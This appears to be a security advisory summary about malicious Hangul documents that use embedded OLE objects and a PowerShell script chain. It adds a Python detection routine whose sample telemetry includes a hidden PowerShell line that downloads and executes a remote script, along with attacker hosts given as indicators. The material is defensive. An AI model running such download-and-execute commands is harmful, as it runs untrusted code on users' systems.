Beware of Hangul Documents with Malicious OLE Objects Embedded
2023-10-27 • AhnLab • Warning about Hangul documents containing malicious OLE objects
AhnLab ASEC analyzed malicious Hangul documents aimed at people working in defense, media, unification, education, and broadcasting-related fields. One cluster used oversized embedded OLE objects so that nearly any click in the document triggered a connection to attacker URLs such as host.sharingdocument[.]one or mail.smartprivacyc[.]com, with per-document parameters suggesting targeted delivery. A second cluster embedded batch and text files that launched PowerShell, fetched obfuscated scripts from a GitHub repository, collected recent file lists, network configuration, and process data, and uploaded the results to an FTP server at plm.myartsonline[.]com. The same script chain created startup persistence through an LNK file and thumbs.log so the PowerShell downloader would run again after reboot.
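As an added example, not code from the ASEC report, the following Python triage routine checks endpoint telemetry for the stages of the chain summarized above: Hangul spawning a shell, PowerShell fetching a script from GitHub, traffic to the quoted hosts, and an LNK dropped into the Startup folder. The `Hwp.exe` image name, the event field names, and the sample events are assumptions.

```python
from typing import Dict, List, Tuple

# Indicators quoted in the ASEC summary above, kept defanged and refanged only at match time.
KNOWN_HOSTS = {"host.sharingdocument[.]one", "mail.smartprivacyc[.]com", "plm.myartsonline[.]com"}
HWP_IMAGE = "hwp.exe"  # assumed image name of the Hangul Word Processor
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def refang(host: str) -> str:
    return host.replace("[.]", ".").lower()


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Map each telemetry event to the stage of the described chain it matches, if any."""
    known = {refang(h) for h in KNOWN_HOSTS}
    findings = []
    for e in events:
        if e["type"] == "process":
            image, cmd = basename(e["image"]), e["command_line"].lower()
            # Hangul launching a shell is the pivot from the document to the script stage.
            if basename(e["parent_image"]) == HWP_IMAGE and image in SCRIPT_HOSTS:
                findings.append(("document-to-script", e["command_line"]))
            # PowerShell pulling a script from GitHub matches the downloader stage.
            if image == "powershell.exe" and "github" in cmd and "downloadstring" in cmd:
                findings.append(("downloader", e["command_line"]))
        elif e["type"] == "network" and refang(e["dest_host"]) in known:
            findings.append(("c2-or-exfil", f"{e['image']} -> {e['dest_host']}:{e['dest_port']}"))
        elif e["type"] == "file":
            path = e["path"].lower()
            # An LNK dropped into the Startup folder is the reboot persistence described.
            if path.endswith(".lnk") and STARTUP_DIR in path:
                findings.append(("persistence", e["path"]))
    return findings


# Constructed sample telemetry for a dry run; paths, user name and repository are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Program Files\Hwp\Hwp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r'cmd.exe /c "%TEMP%\doc.bat"'},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString("
                     "'https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/a.txt'))"},
    {"type": "network", "image": "powershell.exe", "dest_host": "plm.myartsonline.com", "dest_port": "21"},
    {"type": "file", "image": "powershell.exe",
     "path": r"C:\Users\EXAMPLE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]
```

Running `triage(SAMPLE_EVENTS)` yields one finding per stage for the four malicious events and nothing for the benign Notepad launch.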